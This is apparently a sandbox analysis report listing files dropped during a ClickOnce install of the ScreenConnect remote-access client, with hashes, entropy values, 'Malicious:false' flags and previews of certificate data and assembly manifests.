                                                                                                                                                                                                                                                Preview:p...... ....(....9...T..(....................S.....6XY.....................6XY.. ......../..^T.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.f.I.s.%.2.B.L.j.D.t.G.w.Q.0.9.X.E.B.1.Y.e.q.%.2.B.t.X.%.2.B.B.g.Q.Q.U.7.N.f.j.g.t.J.x.X.W.R.M.3.y.5.n.P.%.2.B.e.6.m.K.4.c.D.0.8.C.E.A.i.t.Q.L.J.g.0.p.x.M.n.1.7.N.q.b.2.T.r.t.k.%.3.D...
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):254
                                                                                                                                                                                                                                                Entropy (8bit):3.052898866971229
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:kKipLDcJgjcalgRAOAUSW0PTKDXMOXISKlUp:yLYS4tWOxSW0PAMsZp
                                                                                                                                                                                                                                                MD5:595825846F05157BCC516613DA931788
                                                                                                                                                                                                                                                SHA1:0A13C571C5F82C6EBC5823CE175CEEF10A303686
                                                                                                                                                                                                                                                SHA-256:AEF6119050BE7A3BDC61F5E019D400925168B1E9FA0614CE9FC87C80C37EBFC0
                                                                                                                                                                                                                                                SHA-512:944A3D5E6B49427642CE33F0C204E4D6D49568C3063600C250AE5C2E2C984299139AC5682653196D3735825B436A0AD49BC0C73F01A5EDBDE54FDE191F21A262
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:p...... ....l....[.@.T..(....................................................... ............n......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.R.o.o.t.G.4...c.r.t...".5.a.2.8.6.4.1.7.-.5.9.4."...
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):25496
                                                                                                                                                                                                                                                Entropy (8bit):5.556128670031695
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:SlquBOGo26tX9DkX9R/QPIBM7YvkZdgXhO5YKTd5//:Ssqo26tX9DkX9R/QPI+0cDYKTd53
                                                                                                                                                                                                                                                MD5:CB94AF80BB2FB9880CF4BFB4F4092BCB
                                                                                                                                                                                                                                                SHA1:E9E939B7AD57CFE7983360521B89D23323B03222
                                                                                                                                                                                                                                                SHA-256:BF89E65893BA6A641C20EC60093FB2735D611FDCE88EB7E2698D382B7BE728BA
                                                                                                                                                                                                                                                SHA-512:BB52D5BE4F7003A8B6B5D718773A54E4082253FDB6189268E9B1E51392D97D60C42CEABF624551D268A37A010CA93412D9CAEE551375E97110C7F3A981A6BEA2
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:PcmH.........KK..x..f.......!...T...........................e...?....<.g..J.|r,..`P....}'.d.........8........R....................U.K...W.....U..c...................'-........s".I...R.....$...........3..L.G.......S..{.........6.......'~.x.h.....[...........5...M...8..........~9......-.a:...j.......;...K*...!.<......6..A....y.].m..C....=4.....E....&..{.!.G....qz...#aI...@.R....K....u..IV..N......D..O.....E..X.R...O.&r..VzU......3LD.SY...[s.T..<\...........`.......=...P...S...V...Z...].......,.......L.......T.......\.......`.......|...........................................@.......0...........<.......T.......h.......|...0.......................................0...........<.......T.......h.......|...0.......................................0...........8.......L.......`...0...l.......................................................................,.......8.......L.......`.......l...........................................................................................@...
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10074), with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):17866
                                                                                                                                                                                                                                                Entropy (8bit):5.954687824833028
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:ze1oEQwK45aMUf6FX9hJX9FX9R/QPIYM7Y7:zd6FX9hJX9FX9R/QPIN07
                                                                                                                                                                                                                                                MD5:1DC9DD74A43D10C5F1EAE50D76856F36
                                                                                                                                                                                                                                                SHA1:E4080B055DD3A290DB546B90BCF6C5593FF34F6D
                                                                                                                                                                                                                                                SHA-256:291FA1F674BE3CA15CFBAB6F72ED1033B5DD63BCB4AEA7FBC79FDCB6DD97AC0A
                                                                                                                                                                                                                                                SHA-512:91E8A1A1AEA08E0D3CF20838B92F75FA7A5F5DACA9AEAD5AB7013D267D25D4BF3D291AF2CA0CCE8B73027D9717157C2C915F2060B2262BAC753BBC159055DBDF
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.10.8991" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" paramet
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):3452
                                                                                                                                                                                                                                                Entropy (8bit):4.331504265817368
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:3IEfBeF7lWuWW+Lg0e6S+9owQX7g27mL438ciUcVM8Aw+ik2hIYX:3J3uWWWeV+WwQXlmL4MckVM8Aw+ehIYX
                                                                                                                                                                                                                                                MD5:4911C71204D1F502DBA5DD5DFB6BE06B
                                                                                                                                                                                                                                                SHA1:80CB0D5FA8D58FE6969CBFDEF62FEF25B381608B
                                                                                                                                                                                                                                                SHA-256:BA3B51A18463F85B3F6E65DCA50301D2394FD0E8635D8B0AFD33F795BE5494A2
                                                                                                                                                                                                                                                SHA-512:E1D1DD8BAF09E265DFC91E6C766C57C240F87983F2B67F8277B43523B3332732A242AE8FECD676A121A40A9FD2A008530576AFAEDE1C9B93E27B8500D190F014
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:PcmH........9^...9.#...(.......T..........................."........<.g..J.|r,..`P..............E..X......U..c...................'-........s".I...R.....$...........3..L.G.....'~.x.h.................z..w.....[~31.X....s)..;$D......B(.........f..VC.........;..........................0...@...0...p...0.......0...................................0.......4.......D.......T.......\...4...h...........P...\...........@...................................,...(...4.......\.......d.......x...(.......................(.......................(...........$...4...,.......`...................................................................................................................................................................................................nameScreenConnect.Core%%processorArchitecture%%%msilpublicKeyToken%%4B14C015C87C1AD8version%24.2.10.8991....................................................MdHd............D...........MdSp(...$...(...(...#............... urn:schemas
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1216
                                                                                                                                                                                                                                                Entropy (8bit):5.1303806593325705
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:JdFYZ8h9onR+geP0Au2vSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0A3GVETDTo
                                                                                                                                                                                                                                                MD5:2343364BAC7A96205EB525ADDC4BBFD1
                                                                                                                                                                                                                                                SHA1:9CBA0033ACB4AF447772CD826EC3A9C68D6A3CCC
                                                                                                                                                                                                                                                SHA-256:E9D6A0964FBFB38132A07425F82C6397052013E43FEEDCDC963A58B6FB9148E7
                                                                                                                                                                                                                                                SHA-512:AB4D01B599F89FE51B0FFE58FC82E9BA6D2B1225DBE8A3CE98F71DCE0405E2521FCA7047974BAFB6255E675CD9B3D8087D645B7AD33D2C6B47B02B7982076710
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssem
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):5260
                                                                                                                                                                                                                                                Entropy (8bit):4.224790743127518
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:sMNq6R84zeV+Ww7mk9O43jYHlIgBXw0vy3ydwnjIbm:sUR840JC9tUHlXBXmTjd
                                                                                                                                                                                                                                                MD5:673DA9D0245654BA2792875F37133E8A
                                                                                                                                                                                                                                                SHA1:83E3F6F7021288817E7687D2EEE2869F61116E08
                                                                                                                                                                                                                                                SHA-256:F4F5E0ECC7E3B43C7836CCD588332374265BAF43A75C5A88A83CB9CCC8424500
                                                                                                                                                                                                                                                SHA-512:D7CBC33EBAD117367C97747A6C32693469E77DAE902F325FEF73633967BAE2AF45A89683F62CB23F606399B020EDAD2E514438812A3108D0E896E1805AE4C234
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:PcmH............_.4...t.......T...............P...........3........<.g..J.|r,..`P............O.&r..Vz.....U..c...................'-........s".I...R.....$...........3..L.G.....[.......................z..w.....[~31.X....C.........y..&..d......B(.........^.ie...u"...F.....Ey%.....E..X.(...s".I...R)....+.`...m,......;../............... ...#...&...*...-...0...0.......0...D...0...t...0.......0.......0.......0...4...0...d...................................................................4...........4...P...........l...@.......................................(........... .......(...(...<.......d.......l.......|...(.......................(.......................(...........8.......@.......T...(...d...................(.......................(...............d...........p.......................................................................................................................................................................................................................
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1982
                                                                                                                                                                                                                                                Entropy (8bit):5.057585371364542
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:JdFYZ8h9onRbggeP0AuEvSkcyMuscVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AbHMrGQAXRTFgTo
                                                                                                                                                                                                                                                MD5:50FC8E2B16CC5920B0536C1F5DD4AEAE
                                                                                                                                                                                                                                                SHA1:6060C72B1A84B8BE7BAC2ACC9C1CEBD95736F3D6
                                                                                                                                                                                                                                                SHA-256:95855EF8E55A75B5B0B17207F8B4BA9370CD1E5B04BCD56976973FD4E731454A
                                                                                                                                                                                                                                                SHA-512:BD40E38CAC8203D8E33F0F7E50E2CAB9CFB116894D6CA2D2D3D369E277D93CDA45A31E8345AFC3039B20DD4118DC8296211BADFFA3F1B81E10D14298DD842D05
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depen
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):6588
                                                                                                                                                                                                                                                Entropy (8bit):4.117153651608771
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:YMmxneV+WwwU8WpZ2LRheuMl2UfdVaMsmksJqi/D5:sxAJwpZ2LRhyl5dVzQw75
                                                                                                                                                                                                                                                MD5:D460BF8252B447DF4DBBAFEDD3A16934
                                                                                                                                                                                                                                                SHA1:1F5468F62EAF84128BC68765A65F3496E987F3D6
                                                                                                                                                                                                                                                SHA-256:8809C269B6CE3EAB0FD5ACB819E1BD63984203466859BFEA64CF924FD6EFA4AC
                                                                                                                                                                                                                                                SHA-512:B7C65BCDED31D5A339C2693D3B9B45AE143EEECBAF3E5F3522BE909945A2580D288B57B305853A19BE86F6D9246B5012ECDFDF8DD08D4F28AB7099E454DE0827
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:PcmH...........inU.b@...........T...............t...........?........<.g..J.|r,..`P.............U.K...W.....U..c...................'-........s".I...R.....$...........3..L.G.........}'.d................z..w.....[~31.X....y..&..d......B(.........C....."...^.ie...u%...[s.T..<(...s".I...R)...F.....Ey,.....E..X./...f..VC..2...O.&r..Vz5......;..8.....V....X;........... ...#...&...*...-...0...3...6...9...<...0.......0.......0.......0...4...0...d...0.......0.......0.......0...$...0...T...0.......................................................................4...$.......X...P...X...........@........................... .......0...(...8.......`.......h.......x...(.......................(.......................(...........8.......@.......T...(...d...................(.......................(.......................(...$.......L.......T...(...l...................(.......................(...................................................................................................
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2573
                                                                                                                                                                                                                                                Entropy (8bit):5.026361555169168
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:3FYZ8h9o5gI0AsHMrAXQ3MrTMrRGTDBTo:1YiW4AjEvEJ
                                                                                                                                                                                                                                                MD5:3133DE245D1C278C1C423A5E92AF63B6
                                                                                                                                                                                                                                                SHA1:D75C7D2F1E6B49A43B2F879F6EF06A00208EB6DC
                                                                                                                                                                                                                                                SHA-256:61578953C28272D15E8DB5FD1CFFB26E7E16B52ADA7B1B41416232AE340002B7
                                                                                                                                                                                                                                                SHA-512:B22D4EC1D99FB6668579FA91E70C182BEC27F2E6B4FF36223A018A066D550F4E90AAC3DFFD8C314E0D99B9F67447613CA011F384F693C431A7726CE0665D7647
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):3032
                                                                                                                                                                                                                                                Entropy (8bit):4.875271585255285
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:WMQSc7gye6S+9oww7g47Jw+f7iI++5dFkEM6Vbjfthnwbb:WXScpeV+WwwnJwOiMRkborthnEb
                                                                                                                                                                                                                                                MD5:C99E0A14306D8B01FE649B89D8AF23DF
                                                                                                                                                                                                                                                SHA1:00B50835D5A5CC09FEBD73B1447ED1CD5B1248E3
                                                                                                                                                                                                                                                SHA-256:D12D0E85606AE37D09342D03FC1ED7E6DE1CF800433A65F053A35FBE7D1EFD14
                                                                                                                                                                                                                                                SHA-512:EA32C91E051A10B0711C6B193EAE652BCBE26C63B8A10E5306BF82BBB787D4E4664955671207B50DD2BA2993B6474072726A097F0850DDD51E8012A63B8B4A8F
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:PcmH.........V..+...............T....................................<.g..J.|r,..`P............[s.T..<.....U..c...................'-........s".I...R.....$...........3..L.G.......S..{..................z..w.....[~31.X......E..X.....s".I...R.......;......................0.......0...@...0...p...................................................................4...........<...P...........P...@...h...................................(...............................(...,.......T.......\...(...d...........(...............................................................................................................................................................nameScreenConnect.ClientprocessorArchitecture%%%msilpublicKeyToken%%4B14C015C87C1AD8version%24.2.10.8991....................................................MdHd............<...........MdSp ...$....... ...".............Bp urn:schemas-microsoft-com:asm.v1.assembly.xmlns.1.0.manifestVersion urn:schemas-microsoft-com:asm.v2.asmv2)
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1041
                                                                                                                                                                                                                                                Entropy (8bit):5.147328807370198
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:JdFYZ8h9onRigeP0AuWvSkcyMuscVSkTo:3FYZ8h9oYgI0AHHMrGTo
                                                                                                                                                                                                                                                MD5:2EA1AC1E39B8029AA1D1CEBB1079C706
                                                                                                                                                                                                                                                SHA1:5788C00093D358F8B3D8A98B0BEF5D0703031E3F
                                                                                                                                                                                                                                                SHA-256:8965728D1E348834E3F1E2502061DFB9DB41478ACB719FE474FA2969078866E7
                                                                                                                                                                                                                                                SHA-512:6B2A8AC25BBFE4D1EC7B9A9AF8FE7E6F92C39097BCFD7E9E9BE070E1A56718EBEFFFA5B24688754724EDBFFA8C96DCFCAA0C86CC849A203C1F5423E920E64566
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):14612
                                                                                                                                                                                                                                                Entropy (8bit):5.714794300101318
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:/IWh4+UIn9q5s6VHoY8s8oXN8s8oTN2x2QPIlFDLhEDh7BqWoDOs:/IWp9qS6VTX9dX9R/QPIBM7YDb
                                                                                                                                                                                                                                                MD5:4F13544DA43FDAF497C28C7E6361DAD9
                                                                                                                                                                                                                                                SHA1:E8130F84834AB0ED89329B14B05A9D519189E9F0
                                                                                                                                                                                                                                                SHA-256:D990E51AE130511540DB33D6014491E64B0E1CE9B10A21EF5196522445C0DDA4
                                                                                                                                                                                                                                                SHA-512:6409F5A5E08981F15DC20405616FD4A45D32735536F668DBE4456CC30DB747ACCE888C41BD7DA663B010689BA8390DAE0E840EE998719E8E1CB087B53FAC2485
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:PcmH........,.y;..t.$...@.......T...............8...........#........<.g..J.|r,..`PF...}&............Z.....)....E......x...\......=+.p.......I\t.\..>................j.K...6.....U..c...................'-...........-.a.....$...........3..L.G..........8........R...........}'.d....j...........K*...!.................`...........................0...................................................(.......@.......P.......T...'...X...................................................4................3......P....7......@8......H8......P8......p8......t8..L...|8.......8.......8.......8.......8.......8..ScreenConnect.Client.manifest%%%....]...Tk....Y?.Om................-........................E......................................4.0.30319%%%Client%%4.0%ScreenConnect Software%%ScreenConnect Client....................................P.......nameScreenConnect.WindowsClient.application%processorArchitecture%%%msilpublicKeyToken%%25b0fbb6ef7eb094version%24.2.10.8991........................
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63847), with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):117905
                                                                                                                                                                                                                                                Entropy (8bit):5.586337100898901
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3072:0aN8cT51/FXvMVNWfCXq9ymhm2o9HuzhJOvP:0VcfiVI3mt8vOvP
                                                                                                                                                                                                                                                MD5:A4FE50A6C913DF40834230E7ABF10CE9
                                                                                                                                                                                                                                                SHA1:AD8C36976A5D33D1A4DE1A55F4598828C0F41A0A
                                                                                                                                                                                                                                                SHA-256:66CB8DCE9EB73D465B607088654C44D55002013B41069F74FDFF9AD42EF7AB2A
                                                                                                                                                                                                                                                SHA-512:200DCADA2C2F936E0E41B9AAF918F1F85F57D7E7388465DC8DD01E47EC2C52D28BD7BBD2B58FBA72C6040253BF5968ADAD49762F3252E45C8A842622956EB9EC
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tr
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):4428
                                                                                                                                                                                                                                                Entropy (8bit):4.257837663320519
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:ZoQKXCD5v+1gLe6S+9ow87gFW75uvWbO2MKpWpAk2Gl8mcMkoDprOaJCf:qvXQeV+Ww8U45ucO9l2GlFkoNOrf
                                                                                                                                                                                                                                                MD5:1F6370BEF7EE52A3B989438CCD4E5556
                                                                                                                                                                                                                                                SHA1:C6FCFB56BACCE2D657565C1CF963AE18C827C71C
                                                                                                                                                                                                                                                SHA-256:1253500BAAE3E19CD20D82CDE1F204E4035A26FAC67B46314422759851D14189
                                                                                                                                                                                                                                                SHA-512:1112E461A5FFEE75D03B13883E20E4D16A20B947373B59AE5F70D2C695B8A3D47F3638D697013C078BFB9A57A273CE688C7080257AB3FDF2AC3E13858D68B859
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:PcmH.........D;.#o^.,...T.......T...............8...........+........<.g..J.|r,..`P...............3LD.S.....U..c...................'-........s".I...R.....$...........3..L.G........6...................z..w.....[~31.X....y..&..d......B(.........[s.T..<....s".I...R......E..X.!...O.&r..Vz$......;..'..................."...%...(...0.......0.......0.......0...D...0...t...0................................................... .......0.......8...4...D.......x...P...l...........@...................,.......4.......D...(...L.......t.......|...........(...............................(................... ...(...4.......\.......d...(...|...................(...............L...........0...................................................................................................................................................................................................................................................................................................nameScreenConnect.Cl
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1636
                                                                                                                                                                                                                                                Entropy (8bit):5.084538887646832
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:JdFYZ8h9onRzgeP0AuS+vSkcyMuscbEMuscuMuscVSkcf5bdTo:3FYZ8h9o9gI0AJCHMrTMr3MrGAXTo
                                                                                                                                                                                                                                                MD5:E11E5D85F8857144751D60CED3FAE6D7
                                                                                                                                                                                                                                                SHA1:7E0AE834C6B1DEA46B51C3101852AFEEA975D572
                                                                                                                                                                                                                                                SHA-256:ED9436CBA40C9D573E7063F2AC2C5162D40BFD7F7FEC4AF2BEED954560D268F9
                                                                                                                                                                                                                                                SHA-512:5A2CCF4F02E5ACC872A8B421C3611312A3608C25EC7B28A858034342404E320260457BD0C30EAEFEF6244C0E3305970AC7D9FC64ECE8F33F92F8AD02D4E5FAB0
                                                                                                                                                                                                                                                Malicious:false
